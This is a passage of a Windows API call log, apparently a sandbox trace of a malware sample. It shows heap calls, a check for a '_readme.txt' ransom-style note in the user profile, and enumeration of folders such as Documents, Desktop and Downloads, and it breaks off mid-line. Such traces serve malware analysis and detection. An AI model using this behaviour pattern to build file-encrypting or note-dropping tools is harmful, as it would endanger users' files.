[0188.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.753] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.758] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0188.761] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.761] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.761] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.761] PathFindFileNameW (pszPath="") returned="" [0188.761] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.761] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.761] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.761] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.762] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.762] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0188.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.762] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.763] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.763] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0188.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83fc0 [0188.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.764] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0188.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0188.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0188.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0188.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0188.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.765] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0188.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0188.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0188.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0188.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cfe140 | out: hHeap=0x620000) returned 1 [0188.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.768] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0188.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0188.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0188.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.770] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8c1ba620, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x8c1ba620, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0188.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0188.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0188.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0188.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0188.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.773] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0188.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.773] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf30 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x658268 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6581d8 [0188.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94a80 [0188.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0188.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddea0 | out: hHeap=0x620000) returned 1 [0188.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0188.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0188.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0188.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.777] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7fbc40, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0188.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.778] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0188.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0188.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0188.778] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ac8 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b10 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94b58 [0188.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94ba0 [0188.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf30 | out: hHeap=0x620000) returned 1 [0188.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0188.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0188.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x658268 | out: hHeap=0x620000) returned 1 [0188.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6581d8 | out: hHeap=0x620000) returned 1 [0188.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94a80 | out: hHeap=0x620000) returned 1 [0188.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0188.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0188.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0188.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0188.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0188.782] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98121430, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98121430, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0188.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 